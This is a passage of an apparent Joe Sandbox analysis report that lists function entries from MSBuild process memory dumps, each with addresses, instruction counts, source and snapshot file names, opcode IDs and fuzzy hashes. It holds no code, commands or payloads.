                          Function 058FAB91 Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aec390de4345c07686e88d2e10a5cdca8efd8e2dc3fb70d1e4b2ca6c4f9a5ef4
                          • Instruction ID: 9e229dccfee20c318414d352aa2049f1fb789485666a2db7978bb68cffaecef5
                          • Opcode Fuzzy Hash: aec390de4345c07686e88d2e10a5cdca8efd8e2dc3fb70d1e4b2ca6c4f9a5ef4
                          • Instruction Fuzzy Hash: 4CF0F6325042149FEB289B65D584B2577DAE788334F0AC055CD4AC7246D630EC40C780
                          Function 05AAB383 Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c9d5008b478ca4a629202468aa135a7e0266283a3763ef9ff564490ae4985332
                          • Instruction ID: 15a077f16f5d13b5939e38bc07060c0b6a70818be0ac02b65cb25f72a51fea43
                          • Opcode Fuzzy Hash: c9d5008b478ca4a629202468aa135a7e0266283a3763ef9ff564490ae4985332
                          • Instruction Fuzzy Hash: EDF06231201705ABD714CF19ED85F8AFBAEEF84310F04CA3AB5568B675DA74E90DC690
                          Function 02AEAF50 Relevance: .0, Instructions: 34COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: be35827458bc214b241fc426f27c4c44d4b8614cda9bab847b385385b9975251
                          • Instruction ID: ee1e1e54f3331903a5d9a7ba82de9c50027ff7a4dd2bfe7df541a8577e563e8f
                          • Opcode Fuzzy Hash: be35827458bc214b241fc426f27c4c44d4b8614cda9bab847b385385b9975251
                          • Instruction Fuzzy Hash: 2EF08CB18012958FDF60CFB8C0957AABBB0AF05305F2049AED493DB652DB718507CF91
                          Function 02AE4D38 Relevance: .0, Instructions: 34COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d6b497d6f003fc0d1a115d1cb5b92994af51910afb5e7c3a5ca2e68ee9fcbd75
                          • Instruction ID: 963c653447ebb7420bf31b74b4e6c090b9f867b749e166e74351a10e00ad0233
                          • Opcode Fuzzy Hash: d6b497d6f003fc0d1a115d1cb5b92994af51910afb5e7c3a5ca2e68ee9fcbd75
                          • Instruction Fuzzy Hash: 09F05432700200AFC7119E4ADC95D47B7A9FB9D2A1B148065F609C7221DA32D846DB90
                          Function 05AAC091 Relevance: .0, Instructions: 34COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 339256b7c10748a3ffbc7a274f1e6eb61316bc233a74f22225cf55ed7b1e6693
                          • Instruction ID: c59c629794d1e3079873cbe21ebaf7251252f5965c13217507cd4990d07748e4
                          • Opcode Fuzzy Hash: 339256b7c10748a3ffbc7a274f1e6eb61316bc233a74f22225cf55ed7b1e6693
                          • Instruction Fuzzy Hash: A0F04F363516109FD309DB14D858E2A77A6EF88721F1580A9F9458B3A1CA31DC42CB50
                          Function 02AE6194 Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 274b740f6737143a72df0b68b7ce9d9eb344facaa0aa7851b632281fba68bcb3
                          • Instruction ID: f14505f209b7f4468fb8e0a19fa5ff0fbfa11d38e4820a635589d3763cac6af2
                          • Opcode Fuzzy Hash: 274b740f6737143a72df0b68b7ce9d9eb344facaa0aa7851b632281fba68bcb3
                          • Instruction Fuzzy Hash: 17F06D72400314DFCB78DF64D584A66BBF4FF40320F005AAEE24686951DB7AE549CB51
                          Function 05ACAF41 Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 497a4fd406ab5f6f93b501db0757d399323911cde66218b29eebb25f593ba0c2
                          • Instruction ID: 98080925ef2a79c890d4e51dde39a80c69269b020f33beaffd298290661d3620
                          • Opcode Fuzzy Hash: 497a4fd406ab5f6f93b501db0757d399323911cde66218b29eebb25f593ba0c2
                          • Instruction Fuzzy Hash: 1CF062716042299FDB218F55E504F75BFA5BB84320F1581ADE42AD7191CB70D8428BD1
                          Function 05ACA794 Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2602493cd840d680348ffe837457a0caf132f121b4be3bc98cbda57c42d4d989
                          • Instruction ID: 9754f49c5918fb5097ba0501219d70bf21807ca8749150f44f9623087d1e0e2a
                          • Opcode Fuzzy Hash: 2602493cd840d680348ffe837457a0caf132f121b4be3bc98cbda57c42d4d989
                          • Instruction Fuzzy Hash: 6601B631A0511DCBDB64CBA0EC99FBDBFB2BF08205F048599D00AEA594DB749986DF14
                          Function 05AC7270 Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d5a690ec02c6b45c73cf5b2315fabd4e6c2c29122d5ba7458f60b22b73908fa
                          • Instruction ID: 81efb949dcd59263636da821e3d9cdc4a4ea704b6b7596b52b7bf8ccbb2683d0
                          • Opcode Fuzzy Hash: 2d5a690ec02c6b45c73cf5b2315fabd4e6c2c29122d5ba7458f60b22b73908fa
                          • Instruction Fuzzy Hash: EC013C34E09004CFDB18EB48E184F697BB7F788311F5580AAE81587395DB34DC41CB80
                          Function 05D9363E Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2354143987.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5d90000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d1fd13ca68160e674fc89cc813eb8d7f2ed07eb67e087b574636d1a5eb000133
                          • Instruction ID: fa45f1edeaf1be38244b9a39fd5285c5ed74dd8427fb78898b13015258b53aa1
                          • Opcode Fuzzy Hash: d1fd13ca68160e674fc89cc813eb8d7f2ed07eb67e087b574636d1a5eb000133
                          • Instruction Fuzzy Hash: B5014F34A15128CFDB54DF58D844BAA7BB5FB48310F0040A5D949E3345DA34ADC08F51
                          Function 05AAC0A0 Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8b202b1195e95727b0417a68ed533a32095f692c7bc999c8185f725c6ebcf84
                          • Instruction ID: 5da4e9cde569ae53f5e4cebeeeb3955dcadb31482a78fd20d58805fee7bb6444
                          • Opcode Fuzzy Hash: d8b202b1195e95727b0417a68ed533a32095f692c7bc999c8185f725c6ebcf84
                          • Instruction Fuzzy Hash: D1F05E353102009FC308DB19D468D6A77AAFFC8721B144069FA468B371CA31EC42CB90
                          Function 05AC95F0 Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8308b5108fea1b5656e98f72f507b33dfdd45559226b20e3d2694f89fb778d4b
                          • Instruction ID: 8349f0de48ca26e209dba5e7042907c16859b3692be7404ecddb2af29b2e3320
                          • Opcode Fuzzy Hash: 8308b5108fea1b5656e98f72f507b33dfdd45559226b20e3d2694f89fb778d4b
                          • Instruction Fuzzy Hash: 0BF0347B58D384AFDB138725CC92F693F34AB12300F8D40CAE5859E6E3C1A9D8188799
                          Function 058F6480 Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7d8f3ebc37e5fc6a4c354f9802fbfce2b5079421136b7725d51691df22556321
                          • Instruction ID: 529fc7465fb84fa69897b70b5604c89d3e1db56949960198a5e0b5e01e5d0896
                          • Opcode Fuzzy Hash: 7d8f3ebc37e5fc6a4c354f9802fbfce2b5079421136b7725d51691df22556321
                          • Instruction Fuzzy Hash: D6E04F613002282BE31C66AF6C54B7BA99FEFC5760F24843EA50DCB3A5CC658C0543E8
                          Function 05AA2EF8 Relevance: .0, Instructions: 30COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 66780256b0b6df0f2d3e6713610dacd244f5dba0e975d74d2923f1cdc2301383
                          • Instruction ID: c16ca806e48f012495ccb07053c4536a769c2283dd2d1678ceecfed74c44605f
                          • Opcode Fuzzy Hash: 66780256b0b6df0f2d3e6713610dacd244f5dba0e975d74d2923f1cdc2301383
                          • Instruction Fuzzy Hash: 7BF0BE36E00229ABCF04DB86CD06ADEBBF6EF89300F108069D801B7350DB755D048BA1
                          Function 05AA8998 Relevance: .0, Instructions: 30COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ed489d9fc7c9680b677248724c5b8f85f444e1b89b32ea9b30497c113e3ada7e
                          • Instruction ID: fc0bb98df6edf1f5d25848a38039f6f0fd9fc9f0ea721345ee091e6f173532ef
                          • Opcode Fuzzy Hash: ed489d9fc7c9680b677248724c5b8f85f444e1b89b32ea9b30497c113e3ada7e
                          • Instruction Fuzzy Hash: 67E022A230A2231BFB22021D2C44E2FDB68FBC2A10780063EA841C7342CA458C0683E2
                          Function 05AC381C Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 90f28bac6a25dc91f7ae39f913bfc5aa918c40de96e0960daa6cccc35a04b4a7
                          • Instruction ID: 9bf259c3b0facd3ae0456f694a85b033c6d0a1390dc86b63105f6901b9d08b9b
                          • Opcode Fuzzy Hash: 90f28bac6a25dc91f7ae39f913bfc5aa918c40de96e0960daa6cccc35a04b4a7
                          • Instruction Fuzzy Hash: 7EE09A4240E3E00ECB0397780DB19C23F728D5312670A89DFC1C0CF0B3C409481E83AA
                          Function 02AE4D48 Relevance: .0, Instructions: 28COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: baf0fa798a56488fd8045524ac77453c3af3a3830bd78e47e27ce47a8d8f78e8
                          • Instruction ID: e11de9d7ffb42a8ef0f593a9d057a04c50d691b185f3a014771a394591ec0b24
                          • Opcode Fuzzy Hash: baf0fa798a56488fd8045524ac77453c3af3a3830bd78e47e27ce47a8d8f78e8
                          • Instruction Fuzzy Hash: F6E0C936200204AF87259E9AD8C4C96FBAEFF9D7617548069F60987621CA32E856DB60
                          Function 02AEAF60 Relevance: .0, Instructions: 27COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 95d32e700220b1028b3c2902913ce58fcc61deedf3891b2ef1101163e56475a9
                          • Instruction ID: cceb073b7dd5cb670d3475c2e0cf8f61a6921d387ca4ca0e1f4300cc233f7e64
                          • Opcode Fuzzy Hash: 95d32e700220b1028b3c2902913ce58fcc61deedf3891b2ef1101163e56475a9
                          • Instruction Fuzzy Hash: 89F03AB19003469FDF60DFA9C44476ABBF0AF14305F1049AAD047D7652EB749545CBD2
                          Function 05AA1480 Relevance: .0, Instructions: 27COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f3320fd5524ee644e278571880fbbf3497ad3dc001a7529b89381973059653dc
                          • Instruction ID: 7253854366f6f11342b4b41fc2d3c00e4b38212f9f49a430f600bae6518f7c48
                          • Opcode Fuzzy Hash: f3320fd5524ee644e278571880fbbf3497ad3dc001a7529b89381973059653dc
                          • Instruction Fuzzy Hash: 8BF02732A1D245AFDB06DFB8E0886DC7FB2AF44201F0480EAE0469B281DB740A81CB84
                          Function 05AC5D38 Relevance: .0, Instructions: 26COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 12cbe0b273bd459f3f064f62ca35ad6f54cd069c779725ce6a0feb92e3f09026
                          • Instruction ID: 488286ea89cc2fc7779a2958a412495edd03e5618b527c06c62a303ae09c3e72
                          • Opcode Fuzzy Hash: 12cbe0b273bd459f3f064f62ca35ad6f54cd069c779725ce6a0feb92e3f09026
                          • Instruction Fuzzy Hash: 5FE06D76A00B108FD320CB46D645F22F3E9FF88B62F16556EE58A97A64D730F8018A20
                          Function 05AC1C23 Relevance: .0, Instructions: 26COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3d0488ecc37aea00e68f09a3ce12a819a417e7067ab70966cfd14c8deef7fb6f
                          • Instruction ID: 50048ed2ccefb46861d899b0d62d1aeef01c8f4796f0ee3f13123cbe31abd6b9
                          • Opcode Fuzzy Hash: 3d0488ecc37aea00e68f09a3ce12a819a417e7067ab70966cfd14c8deef7fb6f
                          • Instruction Fuzzy Hash: 4FE0D8767042209BD3148765E944B377BE6FB86721F04807AF509DB641C7719844C6A0
                          Function 05D93F28 Relevance: .0, Instructions: 26COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2354143987.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5d90000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ebbaa13ba4712f396c66c674abf771184754d815d351b40f86c26b08df98314b
                          • Instruction ID: 6d04e099d21272a0bd1e033585128617496df2f295001ab432e9f40ed0a10534
                          • Opcode Fuzzy Hash: ebbaa13ba4712f396c66c674abf771184754d815d351b40f86c26b08df98314b
                          • Instruction Fuzzy Hash: B2F03431A161288BEB58EF29D8447A9BBA5BB48320F0042A69D5DE3391EA349D808B41
                          Function 058FA818 Relevance: .0, Instructions: 26COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 716708c159c28c0da62102e6d161ecc62f5c02b03307f9f9a02d01e080f556e9
                          • Instruction ID: ebe6d7e4285be6779adb36b4b5ab6637deb12ce51f2434c5fd01afbd81b1ad79
                          • Opcode Fuzzy Hash: 716708c159c28c0da62102e6d161ecc62f5c02b03307f9f9a02d01e080f556e9
                          • Instruction Fuzzy Hash: E1F0C470951209DBDB28DF90E59A7AEBBB2BF08315F200029E906B6294CBB40E45DB50
                          Function 05AA1490 Relevance: .0, Instructions: 26COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f84b57912ebc73bbfee55491254c1ec9dffd136be983f7c145d767f58bac7a1f
                          • Instruction ID: 81d573be910ef0b07cf4290904c34f79088d3f428ecf8ccb601bd549cfcc327e
                          • Opcode Fuzzy Hash: f84b57912ebc73bbfee55491254c1ec9dffd136be983f7c145d767f58bac7a1f
                          • Instruction Fuzzy Hash: 8DF09B71A04619AFCB09DF79E049BDDBFF6EF44210F04C095E4069B240DFB41A81CB84
                          Function 05AAA450 Relevance: .0, Instructions: 26COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fc0a1110c8d377c3b7a50194572c2d56003540fc9b77a5be51205ef2f8314bcb
                          • Instruction ID: a4ea2a67e08375f2c96afc93c37abb4fad88e160704264aa37109e2b60b52ace
                          • Opcode Fuzzy Hash: fc0a1110c8d377c3b7a50194572c2d56003540fc9b77a5be51205ef2f8314bcb
                          • Instruction Fuzzy Hash: 61E0926255C7C04FD7179338AC413817FE0AB5B651B0A59DAD8C6CA5ABE6109407CB11
                          Function 05AC7100 Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 287f20e96f6c0438f4eb0d5963cdb902c66e21957ed712376222e1e6ab918ed9
                          • Instruction ID: db4d6174dfc158f66021008fff7b0a63d70cf4403f74709c4f3b971af26c3172
                          • Opcode Fuzzy Hash: 287f20e96f6c0438f4eb0d5963cdb902c66e21957ed712376222e1e6ab918ed9
                          • Instruction Fuzzy Hash: ADF01C34E090018FD748EF48E094F697BB7FB88210F568199E815D7399EB34EC428B80
                          Function 05AA8E00 Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5df0d0c3f28c8fc55ba7e9d5d20741ba2efae09c4df142e6bd1e8147b4506d22
                          • Instruction ID: 37c06d08e12c83aa73cf966642e34f8476082e34e4d49d7d948e3b0366a7c9d4
                          • Opcode Fuzzy Hash: 5df0d0c3f28c8fc55ba7e9d5d20741ba2efae09c4df142e6bd1e8147b4506d22
                          • Instruction Fuzzy Hash: 58E01A312402055BC7149A1AFC85C4FFF9EEEC0264B10CA3AA11A8723ADE74ED0AC6D0
                          Function 02AE3C96 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 59156544922fbd7a78254847fa057d84c427b94e16cc93844aa8866abb03ef57
                          • Instruction ID: 376ec5331301bde624cd67790b02ebb01ca76944fc036277367c0696c08e3cc1
                          • Opcode Fuzzy Hash: 59156544922fbd7a78254847fa057d84c427b94e16cc93844aa8866abb03ef57
                          • Instruction Fuzzy Hash: F2E0C236E001089FCF04CB99F484AECFBB1EB88225F1481A6E519A3651D731A95ACB90
                          Function 05AC5D48 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 62ad5091832ed340f14a6832f9c5fb31005abb07b0e6fa7f0ed9135e301a2b42
                          • Instruction ID: 0c36fb05258b7b39c34595c9430cd7adc4301723744a60532cdfe36aa3716322
                          • Opcode Fuzzy Hash: 62ad5091832ed340f14a6832f9c5fb31005abb07b0e6fa7f0ed9135e301a2b42
                          • Instruction Fuzzy Hash: E1E01A35600B009FC320CB1AD944F13F7E9FFC9A60F55956EE58A87A24DB70F8018B60
                          Function 058F6668 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e234d2093c072ef968f9c4e426228ad853130bb9419b73613df15285cf6eaf59
                          • Instruction ID: 42695c11e91da258564cf373b143693d9f00004d12b79aaaf62e6dcff80ee859
                          • Opcode Fuzzy Hash: e234d2093c072ef968f9c4e426228ad853130bb9419b73613df15285cf6eaf59
                          • Instruction Fuzzy Hash: 47E08C322541643BC754CAADCC41FAABBAD8B8D520F18C05AB895D7292D56AE90387A0
                          Function 058F81E8 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6bfb9a0178c50dbd7adbf450569b6beaeb53397596fa9eee509edbc205ae063e
                          • Instruction ID: c1daf8c111966759d7062fe695d007cc48a9737eb3f78a9175fa5c6463c366f8
                          • Opcode Fuzzy Hash: 6bfb9a0178c50dbd7adbf450569b6beaeb53397596fa9eee509edbc205ae063e
                          • Instruction Fuzzy Hash: 93E0CD322C46049FD7149594DC02F983B54DB54B10F544070F704DFAE1C277E41187C4
                          Function 05AA2E48 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 261441b52036011246d1a897d5d3d823342d5c1a1c7a201806feaba1ed00d919
                          • Instruction ID: 026836c9bdae10e90dd99f6805fd5c09977c7cc59cec9919f05f07accd84db1b
                          • Opcode Fuzzy Hash: 261441b52036011246d1a897d5d3d823342d5c1a1c7a201806feaba1ed00d919
                          • Instruction Fuzzy Hash: 2FE020776443008AE7215BF08E05F7377917F00601F01405AC9159F5D1E722DC818301
                          Function 058FA8C9 Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b90b81bf8225bdfd1de0fbb6155111bc148f504b564729a76c3cfc647f68d51
                          • Instruction ID: b2b617186762fb192b058282bf5d4dff9c9f161f468c2055c887f6eef497d02a
                          • Opcode Fuzzy Hash: 5b90b81bf8225bdfd1de0fbb6155111bc148f504b564729a76c3cfc647f68d51
                          • Instruction Fuzzy Hash: 65E0C23269030AABC706DAB0DD01ADEB36CEB04110F1801B4AD0AC3641EB35DA42C780
                          Function 058F738D Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a2ce29469c259be4351045cd2d1ba9f98f4d3c05ba29a6e65808d0555c21d3ed
                          • Instruction ID: d59c2520c5d1143a20fa83f5c9725c0ab355fece2608d3b8633cfa8a840ebdb1
                          • Opcode Fuzzy Hash: a2ce29469c259be4351045cd2d1ba9f98f4d3c05ba29a6e65808d0555c21d3ed
                          • Instruction Fuzzy Hash: 06F01532C08218DBEB108ED5C4047ACBAB1BB08325F144B75DEAAE3284E7345C4ACF82
                          Function 059046FE Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
